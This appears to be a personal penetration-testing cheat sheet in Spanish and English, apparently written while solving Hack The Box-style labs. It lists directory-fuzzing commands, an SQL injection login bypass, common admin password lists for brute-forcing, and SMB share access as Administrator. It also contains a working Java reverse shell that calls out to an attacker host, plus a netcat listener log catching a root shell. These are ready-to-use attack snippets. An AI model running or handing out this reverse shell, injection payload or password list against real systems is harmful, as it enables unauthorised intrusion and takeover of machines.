*********INSPECCION DE DIRECTORIOS*********

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-small.txt

ejemplo:

  

//gobuster
git clone https://github.com/danielmiessler/SecLists.git
sudo gobuster dir -w /usr/share/wordlists/dirb/common.txt -u {target_ip}


******************************************************
SQL Injection 

Loign page: Username: admin'#   passw:cualquiera clic en login.


**************************
Wappalyzer add-on in browser to see --> para saber con que programas se ha desarrollado ese sitio web 

technology they have used to create their website and possibly find any associated vulnerabilities, we can
use a handy browser plug-in called Wappalyze


****-x php html*************************************

  gobuster dir --url http://10.129.121.169/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
 
 
 *********302 status curl*******************************
 
cURL . This tool will allow us to manipulate HTTP requests made to a server and receive the
responses directly in the terminal, w

302 status
302 resource we requested ( / ) has been (temporarily) moved to http://ignition.htb/
!!ESTO PASA PQ ES UN SOLO SERVIDOR WEBSERVER QUE HOSTEA A VARIAS PAGINAS y hay un tema con el DNS
echo "10.129.121.179 ignition.htb" | sudo tee -a /etc/hosts

gobuster dir --url http://ignition.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

http://ignition.htb/admin
2021***
admin admin123
admin root123
admin password1
admin administrator1
admin changeme1
admin password123
admin qwerty123
admin administrator123
admin changeme123

2022**

123456
123456789
qwerty
password
12345
qwerty123
1q2w3e
12345678
111111
1234567890

********************************
REVERSE SHELL

String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();



#Netcat
nc -lvpn 8000  -- hacer q el host atacante abra un puerto para iniciar un backdoor con otro host, haciendo reverse shell
listening on [any] 8000 ...
connect to [10.10.14.114] from (UNKNOWN) [10.129.123.144] 42682
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cd /root

ip a | grep tun0 -- saber la ip de la vpn del kali linux


*********************************

SMB cliente attack

port 135 RPC
port 139 Netbios
port 445 SMB

#sudo apt install smbclient
#smbclient
#smbclient -L target_ip -U Administrator -- in order to list the various available shares ( -L ) and to attempt a login as the Administrator accounT
└──╼ [★]$ smbclient -L 10.129.123.161 -U Administrator


 smbclient \\\\10.129.123.161\\ADMIN$ -U Administrator  -- DAR ENTER
  smbclient \\\\10.129.123.161\\C$ -U Administrator
  cd Users/Administrator/Desktop
  cat flag.txt
 
 
---Opcion 2
 PSexec.py from Impacket, involving Impacket installation and common attack surface, big
 fingerprinting.
 
 
*****************************


 


********************
 
